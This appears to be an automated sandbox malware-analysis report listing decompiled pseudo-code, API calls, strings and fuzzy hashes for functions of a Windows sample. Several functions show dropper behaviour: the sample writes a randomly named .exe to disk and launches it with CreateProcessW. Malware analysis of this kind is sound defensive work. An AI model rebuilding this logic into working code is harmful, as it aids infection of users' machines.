C-Code - Quality: 48%

			E00410489(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				int _t17;
				void* _t20;
				void* _t25;
				void* _t26;

				_t20 = __ecx;
				_t25 = L00401D00(__ecx, __edx, __edi);
				 *0x4159dc(_t26 - 0x428, 0x104, _t25, _t26 - 0x220);
				HeapFree(GetProcessHeap(), 0, _t25);
				_push(_t26 - 0x18);
				_push( *(_t26 - 8));
				_push(_t20);
				if(L00401F00(_t26 - 0x428) != 0) {
					CloseHandle( *(_t26 - 0x18));
					CloseHandle( *(_t26 - 0x14));
				}
				_t17 = CloseHandle( *(_t26 - 8));
				goto 0x4220e5;
				asm("int3");
				return _t17;
			}

0x00410489
0x0041048e
0x004104a4
0x004104b7
0x004104c0
0x004104c1
0x004104ca
0x004104d5
0x004104da
0x004104e3
0x004104e3
0x004104ec
0x004104f2
0x004104f7
0x004104f8

APIs

_snwprintf.NTDLL ref: 004104A4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004104B0
HeapFree.KERNEL32(00000000), ref: 004104B7
CloseHandle.KERNEL32(?), ref: 004104DA
CloseHandle.KERNEL32(?), ref: 004104E3
CloseHandle.KERNEL32(?), ref: 004104EC

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CloseHandle$Heap$FreeProcess_snwprintf
String ID:
API String ID: 3500179031-0
Opcode ID: 79afa050697149a6c567bc2da12fc89c103b46bcb7aa75a795779ae359624459
Instruction ID: 05bebac0e2c813fe9bd7dff86ded17989858a85dd5c52cf480f6174341937927
Opcode Fuzzy Hash: 79afa050697149a6c567bc2da12fc89c103b46bcb7aa75a795779ae359624459
Instruction Fuzzy Hash: 61F01DB2900119FBCF116BE1ED49EEE7B38AF44345F0084A6F605A1061DA798A94CBA8

Uniqueness

Uniqueness Score: 4.01%

Function 0040F8B4, Relevance: 9.0, APIs: 6, Instructions: 22
fileCOMMON

C-Code - Quality: 51%

			E0040F8B4() {
				int _t3;
				void* _t7;
				void* _t9;
				void* _t11;

				_t7 = MapViewOfFile();
				if(_t7 != 0) {
					 *0x415a0c = RtlComputeCrc32(0, _t7, GetFileSize(_t11, 0));
					UnmapViewOfFile(_t7);
				}
				CloseHandle(_t9);
				_t3 = CloseHandle(_t11);
				return _t3;
			}

0x0040f8ba
0x0040f8be
0x0040f8d4
0x0040f8d9
0x0040f8d9
0x0040f8e0
0x0040f8e8
0x0040f8f0

APIs

MapViewOfFile.KERNEL32 ref: 0040F8B4
GetFileSize.KERNEL32(?,00000000), ref: 0040F8C3
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0040F8CD
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0040F8D9
CloseHandle.KERNEL32 ref: 0040F8E0
CloseHandle.KERNEL32 ref: 0040F8E8

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: File$CloseHandleView$ComputeCrc32SizeUnmap
String ID:
API String ID: 741204879-0
Opcode ID: 07641e99a0f5a375f4df3e1ce0aec7b6ff02bfb1285da012aea8092a575771af
Instruction ID: 8f97de588f8547aeb9abc773444ab29199e226efa96818228992a49d60fbcd49
Opcode Fuzzy Hash: 07641e99a0f5a375f4df3e1ce0aec7b6ff02bfb1285da012aea8092a575771af
Instruction Fuzzy Hash: 8CE0BF73100A00EBD6012BA5BC8CBEA7768FBC8752F00C035F605C1560CB7948414B69

Uniqueness

Uniqueness Score: 0.01%

Function 003E2F8A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97windowCOMMON

APIs

LoadIconA.USER32 ref: 003E2FE3
LoadImageA.USER32 ref: 003E30AA

Strings

MainWClass, xrefs: 003E3030
MainMenu, xrefs: 003E3036
0, xrefs: 003E2FA3

Memory Dump Source

Source File: 00000006.00000002.1665362064.003E0000.00000040.sdmp, Offset: 003E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_3e0000_810.jbxd

Similarity

API ID: Load$IconImage
String ID: 0$MainMenu$MainWClass
API String ID: 666102371-1064549320
Opcode ID: d3cb57890abc7ea5f004fdaa49cc5c8b2dd2754089ad085daae6161deb8c71d5
Instruction ID: 1250a7c142e8d520d19b82e4b8a54021fa0bfd8a3fa83a794dbfe384a685fd4c
Opcode Fuzzy Hash: d3cb57890abc7ea5f004fdaa49cc5c8b2dd2754089ad085daae6161deb8c71d5
Instruction Fuzzy Hash: 3F41E7B0D003588FDB15DFA9E88529EBBF4FB48304F10852AE919AB394D779A905CF91

Uniqueness

Uniqueness Score: 3.75%

Function 0040F90A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
memoryCOMMON

C-Code - Quality: 66%

			E0040F90A(DWORD* __eax, void* __esi) {
				void* _t15;
				intOrPtr _t20;
				void* _t21;
				int _t24;
				char _t27;
				void* _t33;
				void* _t36;
				void* _t38;
				void* _t40;

				_t35 = __esi;
				 *(_t38 - 4) = 0x10;
				if(GetComputerNameW(_t38 - 0x34, __eax) == 0) {
					L12:
					 *(_t38 - 0x14) = 0x58;
					L13:
					goto 0x421c88;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t15 = L00401C60(_t32, 0x58, _t35);
					_t36 = _t15;
					 *0x415858(0x4180e8, 0x104, _t36, _t38 - 0x14,  *0x416d58);
					return HeapFree(GetProcessHeap(), 0, _t36);
				}
				_t33 = _t38 - 0x34;
				_t20 = E00401350(_t33);
				_push(_t33);
				 *0x41610c = _t20;
				_t32 = 0x413cc0;
				_t21 = L00401C60(0x413cc0, 0x58, __esi);
				_t40 = _t40 + 4;
				_t35 = _t21;
				_t24 = WideCharToMultiByte(0, 0x400, _t38 - 0x34, 0xffffffff, _t38 - 0x14, 0x10, _t35, 0);
				HeapFree(GetProcessHeap(), 0, _t35);
				if((0 | _t24 > 0x00000000) == 0) {
					goto L12;
				}
				_t32 = _t38 - 0x14;
				if( *(_t38 - 0x14) == 0) {
					goto L13;
				} else {
					goto L3;
				}
				do {
					L3:
					_t27 =  *_t32;
					if(_t27 < 0x30 || _t27 > 0x39) {
						if(_t27 < 0x61 || _t27 > 0x7a) {
							if(_t27 < 0x41 || _t27 > 0x5a) {
								 *_t32 = 0x58;
							}
						}
					}
					_t32 = _t32 + 1;
				} while ( *_t32 != 0);
				goto L13;
			}

0x0040f90a
0x0040f90a
0x0040f91e
0x0040f9ad
0x0040f9ad
0x0040f9b3
0x0040f9b3
0x0040f9b8
0x0040f9b9
0x0040f9ba
0x0040f9bb
0x0040f9bc
0x0040f9bd
0x0040f9be
0x0040f9c9
0x0040f9da
0x0040f9f7
0x0040f9f7
0x0040f925
0x0040f928
0x0040f92d
0x0040f933
0x0040f938
0x0040f93d
0x0040f942
0x0040f945
0x0040f95d
0x0040f974
0x0040f97d
0x00000000
0x00000000
0x0040f983
0x0040f986
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f988
0x0040f988
0x0040f988
0x0040f98c
0x0040f994
0x0040f99c
0x0040f9a2
0x0040f9a2
0x0040f99c
0x0040f994
0x0040f9a5
0x0040f9a6
0x00000000

APIs

GetComputerNameW.KERNEL32(?), ref: 0040F916
WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 0040F95D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F96D
HeapFree.KERNEL32(00000000), ref: 0040F974

Strings

X, xrefs: 0040F9AD

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$ByteCharComputerFreeMultiNameProcessWide
String ID: X
API String ID: 4005268116-3081909835
Opcode ID: 223e8fdd525acaaa44bc48e4148d815719d5974ed8ef63831f5faeced4d73e63
Instruction ID: e8bf941ef3cdba58e8e430ff317f91ee90b75d28defc78a2b8ddb1855ac99b80
Opcode Fuzzy Hash: 223e8fdd525acaaa44bc48e4148d815719d5974ed8ef63831f5faeced4d73e63
Instruction Fuzzy Hash: CA112BF1A44209BAEB309BA49D44BEF37689F02304F54403BE141F55D1D67C8A4ACB6F

Uniqueness

Uniqueness Score: 3.75%

Function 00410372, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45filestringCOMMON

APIs

lstrlenW.KERNEL32(?), ref: 00410391
GetTickCount.KERNEL32 ref: 004103A7
CreateFileW.KERNEL32(0065002E,40000000,00000000,00000000), ref: 00410408

Strings

., xrefs: 004103D4
x, xrefs: 004103E1

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CountCreateFileTicklstrlen
String ID: .$x
API String ID: 4247372160-1654958672
Opcode ID: bc542e8587632847aa5c1b11afc833299b81a85472d53c6c1b45dfc8b07c45de
Instruction ID: 9f30804ad24b494b699217a3ab2ffc437e4bd3fd08113a3ef762ea0917ce6450
Opcode Fuzzy Hash: bc542e8587632847aa5c1b11afc833299b81a85472d53c6c1b45dfc8b07c45de
Instruction Fuzzy Hash: FB119671640718FBE7208FA0EC89FDA3760BB48700F1441A5EA09EF2D1DBB4DA458BC8

Uniqueness

Uniqueness Score: 3.75%

Function 00410242, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
filestringCOMMON

C-Code - Quality: 23%

			E00410242(void* __eax, void* __ecx) {
				int _t36;
				int _t37;
				void* _t43;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				void* _t51;
				void* _t54;
				void* _t57;

				_t43 = __ecx;
				 *0x415a94(0, 0x23, 0, 0, __eax);
				_t48 = lstrlenW(_t57 - 0x268);
				 *((short*)(_t57 + _t48 * 2 - 0x268)) = 0x5c;
				_t49 = _t48 + 1;
				_t54 = (GetTickCount() & 0x0000000f) + 4;
				L00401FD0( &((_t57 - 0x268)[_t49]), _t54);
				_t50 = _t49 + _t54;
				 *((intOrPtr*)(_t57 + _t50 * 2 - 0x268)) = 0x65002e;
				 *((intOrPtr*)(_t57 + _t50 * 2 - 0x264)) = 0x650078;
				 *((short*)(_t57 + _t50 * 2 - 0x260)) = 0;
				 *((intOrPtr*)(_t57 - 4)) =  *((intOrPtr*)(_t43 + 4));
				_t36 = CreateFileW(_t57 - 0x268, 0x40000000, 0, 0, 2, 0x80, 0);
				_t51 = _t36;
				if(_t51 != 0xffffffff) {
					goto 0x422019;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t37 = WriteFile();
					_t36 = CloseHandle(_t51);
					if(_t37 != 0) {
						goto 0x422032;
						asm("int3");
						asm("int3");
						asm("int3");
						memset();
						 *(_t57 - 0x60) = 0x44;
						_t36 = CreateProcessW(_t57 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t57 - 0x60, _t57 - 0x14);
						if(_t36 != 0) {
							CloseHandle( *(_t57 - 0x14));
							_t36 = CloseHandle( *(_t57 - 0x10));
						}
					}
				}
				goto 0x422048;
				asm("int3");
				return _t36;
			}

0x00410242
0x0041024d
0x00410260
0x00410267
0x0041026f
0x00410284
0x00410289
0x00410290
0x0041029d
0x004102aa
0x004102b5
0x004102c2
0x004102d1
0x004102d7
0x004102dc
0x004102de
0x004102e3
0x004102e4
0x004102e5
0x004102e6
0x004102e7
0x004102e8
0x004102e9
0x004102f2
0x004102fa
0x004102fc
0x00410301
0x00410302
0x00410303
0x00410304
0x0041030d
0x00410331
0x00410339
0x0041033e
0x00410347
0x00410347
0x00410339
0x004102fa
0x0041034d
0x00410352
0x00410353

APIs

lstrlenW.KERNEL32(?), ref: 0041025A
GetTickCount.KERNEL32 ref: 00410270
CreateFileW.KERNEL32(0065002E,40000000,00000000,00000000), ref: 004102D1

Strings

x, xrefs: 004102AA
., xrefs: 0041029D

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CountCreateFileTicklstrlen
String ID: .$x
API String ID: 4247372160-1654958672
Opcode ID: 4415a48e05c55b4f12fd5d6df0c5156e9611a7b90973e8c9af3fa78fbe73276d
Instruction ID: fdcb9e78a245b65c74cc2f5c8eae275d8571d0f339a2135db623012a4199a810
Opcode Fuzzy Hash: 4415a48e05c55b4f12fd5d6df0c5156e9611a7b90973e8c9af3fa78fbe73276d
Instruction Fuzzy Hash: 0C01B971B44719EBE7208FA0DC4DBD93660AB44701F1442B5EA09EF2E0DFB59D45CB89

Uniqueness

Uniqueness Score: 3.75%

Function 004100CE, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
processCOMMON

C-Code - Quality: 61%

			E004100CE() {
				int _t11;
				void* _t13;

				memset();
				 *(_t13 - 0x60) = 0x44;
				_t11 = CreateProcessW(_t13 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x60, _t13 - 0x18);
				if(_t11 != 0) {
					CloseHandle( *(_t13 - 0x18));
					_t11 = CloseHandle( *(_t13 - 0x14));
				}
				goto 0x421f61;
				asm("int3");
				return _t11;
			}

0x004100ce
0x004100d7
0x004100fb
0x00410103
0x00410108
0x00410111
0x00410111
0x00410117
0x0041011c
0x0041011d

APIs

memset.NTDLL ref: 004100CE
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004100FB
CloseHandle.KERNEL32(?), ref: 00410108
CloseHandle.KERNEL32(?), ref: 00410111

Strings

D, xrefs: 004100D7

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: 5ae8151c8b33ad581b09603875845c3df51e5d54916246f71df8e9eb3cb66400
Instruction ID: 1241bbbecc9c77a8939a4e86737d4adbbefe0b54cab7b12fe8de8b2ee9e813fd
Opcode Fuzzy Hash: 5ae8151c8b33ad581b09603875845c3df51e5d54916246f71df8e9eb3cb66400
Instruction Fuzzy Hash: 75E01AB280410CEBCF008BE0EC0DAEE7B78BB44301F004026E205E6160DB398954CB59

Uniqueness

Uniqueness Score: 0.08%

Function 00410304, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
processCOMMON

C-Code - Quality: 61%

			E00410304() {
				int _t11;
				void* _t13;

				memset();
				 *(_t13 - 0x60) = 0x44;
				_t11 = CreateProcessW(_t13 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x60, _t13 - 0x14);
				if(_t11 != 0) {
					CloseHandle( *(_t13 - 0x14));
					_t11 = CloseHandle( *(_t13 - 0x10));
				}
				goto 0x422048;
				asm("int3");
				return _t11;
			}

0x00410304
0x0041030d
0x00410331
0x00410339
0x0041033e
0x00410347
0x00410347
0x0041034d
0x00410352
0x00410353

APIs

memset.NTDLL ref: 00410304
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00410331
CloseHandle.KERNEL32(?), ref: 0041033E
CloseHandle.KERNEL32(?), ref: 00410347

Strings

D, xrefs: 0041030D

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: f38f686fb96cc213d9459e4d04c95e5a87661577bb76df5149e7dc8cc3f26e98
Instruction ID: 72b297c3ae07479b173f18c12d7e0d6b42cb0d0c33c1f5c7090adaaafd4b6c3d
Opcode Fuzzy Hash: f38f686fb96cc213d9459e4d04c95e5a87661577bb76df5149e7dc8cc3f26e98
Instruction Fuzzy Hash: 51E01AB280411CEBCF009BD0ED0CBEE7778BB40301F008426E205EA060DB788954CB2A

Uniqueness

Uniqueness Score: 0.08%

Function 0040FF8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 23
processCOMMON

C-Code - Quality: 33%

			E0040FF8F() {
				int _t9;
				void* _t11;

				memset();
				 *(_t11 - 0x58) = 0x44;
				_t9 = CreateProcessW(0x417ee0, 0, 0, 0, 0, 0, 0, 0, _t11 - 0x58, _t11 - 0x10);
				if(_t9 != 0) {
					CloseHandle( *(_t11 - 0x10));
					_t9 = CloseHandle( *(_t11 - 0xc));
				}
				goto 0x421ef4;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				return _t9;
			}

0x0040ff8f
0x0040ff98
0x0040ffba
0x0040ffc2
0x0040ffc7
0x0040ffd0
0x0040ffd0
0x0040ffd6
0x0040ffdb
0x0040ffdc
0x0040ffdd
0x0040ffde
0x0040ffdf

APIs

memset.NTDLL ref: 0040FF8F
CreateProcessW.KERNEL32(00417EE0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0040FFBA
CloseHandle.KERNEL32(?), ref: 0040FFC7
CloseHandle.KERNEL32(?), ref: 0040FFD0

Strings

D, xrefs: 0040FF98

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CloseHandle$CreateProcessmemset
String ID: D
API String ID: 657545203-2746444292
Opcode ID: 60942cb17f81f3e3128b4e73fa6a4e912ef16621627379a863812e51a7c4ec6b
Instruction ID: 53b99d828e5b5983620fe928760284be21a31ff1095c0611e3fd1c4c072b7c1b
Opcode Fuzzy Hash: 60942cb17f81f3e3128b4e73fa6a4e912ef16621627379a863812e51a7c4ec6b
Instruction Fuzzy Hash: A0E0ECB1904149EFDB109FD1EC08BEE7B79FF40701F108436E612E51A0DB7849548B1D

Uniqueness

Uniqueness Score: 0.08%

Function 0040F720, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 20
memoryUNIQUE

C-Code - Quality: 33%

			E0040F720(void* __esi) {
				void* _t2;
				void* _t8;
				void* _t10;

				memset();
				_t2 = L00401D00(0x413ee0, 0x1b8, _t8);
				_t10 = _t2;
				 *0x4159dc(0x417ee0, 0x104, _t10, 0x4181f0, 0x417cd0, 0x67165621);
				return HeapFree(GetProcessHeap(), 0, _t10);
			}

0x0040f720
0x0040f735
0x0040f744
0x0040f751
0x0040f76b

APIs

memset.NTDLL ref: 0040F720
_snwprintf.NTDLL ref: 0040F751
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F75D
HeapFree.KERNEL32(00000000), ref: 0040F764

Strings

>A, xrefs: 0040F730

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FreeProcess_snwprintfmemset
String ID: >A
API String ID: 3735989449-2754608871
Opcode ID: d5fb591f41bff94108707e5a6c92a1594d3aceac701f046c82b1cbc8a9f6e392
Instruction ID: 13aa5f86da930377c61fbc41af2731c4c11c89c43f74ffcdcd0cdb42147a06a2
Opcode Fuzzy Hash: d5fb591f41bff94108707e5a6c92a1594d3aceac701f046c82b1cbc8a9f6e392
Instruction Fuzzy Hash: A3E01271649710FBD20017A6BC0EBDE3D25DB857A6F20C076F505A91D1CBB908D087AE

Uniqueness

Uniqueness Score: 100.00%

Function 00402217, Relevance: 7.6, APIs: 5, Instructions: 60memoryCOMMON

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 00402223
RtlAllocateHeap.NTDLL(00000000), ref: 0040222A
memcpy.NTDLL(?,?,?,?,?,?), ref: 00402264
GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 004022DA
HeapFree.KERNEL32(00000000), ref: 004022E1

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: af02bf12b34d2af5aaa8da599d2bb3ef266a5e348a8ea40636a711302f39a059
Instruction ID: aa4441a01e45c61221b16f5603ca6a26194d8ed068d5b9a9c2967e3af9b51de2
Opcode Fuzzy Hash: af02bf12b34d2af5aaa8da599d2bb3ef266a5e348a8ea40636a711302f39a059
Instruction Fuzzy Hash: 2A110672A00205EFCB118FA4DD48BEEBFB8FF04341F1081A6F508D62A0D7718950DB94

Uniqueness

Uniqueness Score: 0.08%

Function 00406A24, Relevance: 7.5, APIs: 6, Instructions: 45
memoryCOMMON

C-Code - Quality: 61%

			E00406A24(void* __eax, intOrPtr* __ebx, void* __edi) {
				void _t38;
				intOrPtr _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t51;
				void* _t54;
				void* _t57;
				void* _t60;

				_t54 = __edi;
				_t42 = __ebx;
				if(L00401740(_t60 - 0xb0,  *((intOrPtr*)(__eax + 4))) != 0) {
					_push(_t60 - 0x10);
					if(L00402300(_t54, _t60 - 0x24, _t54) != 0) {
						_t47 =  *(_t60 - 0x10);
						_t51 = _t42 + 4;
						_t38 =  *_t47;
						 *_t51 = _t38;
						if(_t38 < 0x4000000) {
							_push(_t51);
							_t41 = L004067D0(_t47 + 4,  *((intOrPtr*)(_t60 - 0xc)) - 4, _t54);
							_t47 =  *(_t60 - 0x10);
							 *_t42 = _t41;
						}
						HeapFree(GetProcessHeap(), 0, _t47);
					}
					HeapFree(GetProcessHeap(), ??, ??);
				}
				HeapFree(GetProcessHeap(), 0, _t57);
				HeapFree(GetProcessHeap(), 0,  *(_t60 - 8));
				HeapFree(GetProcessHeap(), ??, ??);
				HeapFree(GetProcessHeap(), ??, ??);
				if( *_t42 == 0) {
					 *(_t54 + 0x1c) =  *(_t54 + 0x1c) + 1;
					return 0 |  *_t42 != 0x00000000;
				} else {
					 *((intOrPtr*)(_t54 + 0x20)) =  *((intOrPtr*)(_t54 + 0x20)) + 1;
					 *(_t54 + 0x1c) = 0;
					return 0 |  *_t42 != 0x00000000;
				}
			}

0x00406a24
0x00406a24
0x00406a38
0x00406a3f
0x00406a4d
0x00406a4f
0x00406a52
0x00406a55
0x00406a57
0x00406a5e
0x00406a60
0x00406a6a
0x00406a6f
0x00406a75
0x00406a75
0x00406a81
0x00406a81
0x00406a93
0x00406a93
0x00406aa3
0x00406ab5
0x00406ac7
0x00406ad9
0x00406ae2
0x00406afc
0x00406b0c
0x00406ae4
0x00406ae4
0x00406ae9
0x00406afb
0x00406afb

APIs

GetProcessHeap.KERNEL32(00000000,?), ref: 00406A7A
HeapFree.KERNEL32(00000000), ref: 00406A81
GetProcessHeap.KERNEL32(00000000), ref: 00406A9C
HeapFree.KERNEL32(00000000), ref: 00406AA3
GetProcessHeap.KERNEL32(00000000,?), ref: 00406AAE
HeapFree.KERNEL32(00000000), ref: 00406AB5

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 51f2211b88feccf5bf7077926f56973d794f7d7deafe6acd3256a60acf00980d
Instruction ID: 08b9442a464671b9f0472f67fc6d8fb48059d16a17ec6d5561df00c13961b1ee
Opcode Fuzzy Hash: 51f2211b88feccf5bf7077926f56973d794f7d7deafe6acd3256a60acf00980d
Instruction Fuzzy Hash: E60184B1900205DBDB00AFA0DD49BEE7B75FF45305F0484A9E506AA1A1E7759900CB59

Uniqueness

Uniqueness Score: 0.01%

Function 00402597, Relevance: 7.5, APIs: 5, Instructions: 36memoryCOMMON

APIs

WideCharToMultiByte.KERNEL32 ref: 00402597
GetProcessHeap.KERNEL32 ref: 004025B6
HeapFree.KERNEL32(00000000), ref: 004025BD
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004025D5
HeapFree.KERNEL32(00000000), ref: 004025DC

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FreeProcess$ByteCharMultiWide
String ID:
API String ID: 2131386014-0
Opcode ID: c6a94b76a3118108428b8fa852764c3ebcce55e36744ebf89fc0c55328b7a033
Instruction ID: c37fe354763dc31cc1a768981499a9147adffa2fb670acefbdebb32e51a11fee
Opcode Fuzzy Hash: c6a94b76a3118108428b8fa852764c3ebcce55e36744ebf89fc0c55328b7a033
Instruction Fuzzy Hash: 1CF09035A05211EFCB104FA0AD1D6AE77B4AF44312B114476E802E72D0D77988008B6D

Uniqueness

Uniqueness Score: 3.75%

Function 0040119C, Relevance: 7.5, APIs: 5, Instructions: 34
memoryCOMMON

C-Code - Quality: 19%

			E0040119C(void* __edi) {
				void* _t19;
				void* _t24;
				void* _t26;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t34;

				_t29 = __edi;
				_t31 = L00401D00(_t26, _t28, __edi);
				 *0x4159dc(_t34 - 0x98, 0x40, _t31,  *((intOrPtr*)(_t34 - 8)));
				HeapFree(GetProcessHeap(), 0, _t31);
				_t32 = CreateEventW(0, 1, 0, _t34 - 0x98);
				if(_t32 != 0) {
					goto 0x42007f;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					GetModuleFileNameW();
					_push(_t34 - 0x18);
					_push(0x80);
					_t19 = L00401E80(_t32); // executed
					if(_t19 != 0) {
						WaitForSingleObject(_t32, 0xffffffff); // executed
						CloseHandle( *(_t34 - 0x18));
						CloseHandle( *(_t34 - 0x14));
					}
					CloseHandle(_t32);
				}
				CloseHandle(_t24);
				return _t29;
			}

0x0040119c
0x004011a4
0x004011b3
0x004011c6
0x004011df
0x004011e3
0x004011e5
0x004011ea
0x004011eb
0x004011ec
0x004011ed
0x004011ee
0x004011ef
0x004011f0
0x004011f1
0x004011f2
0x004011f3
0x004011fc
0x004011fd
0x00401208
0x00401212
0x00401217
0x00401220
0x00401229
0x00401229
0x00401230
0x00401230
0x00401237
0x00401245

APIs

_snwprintf.NTDLL ref: 004011B3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004011BF
HeapFree.KERNEL32(00000000), ref: 004011C6
CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 004011D9
CloseHandle.KERNEL32 ref: 00401237

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
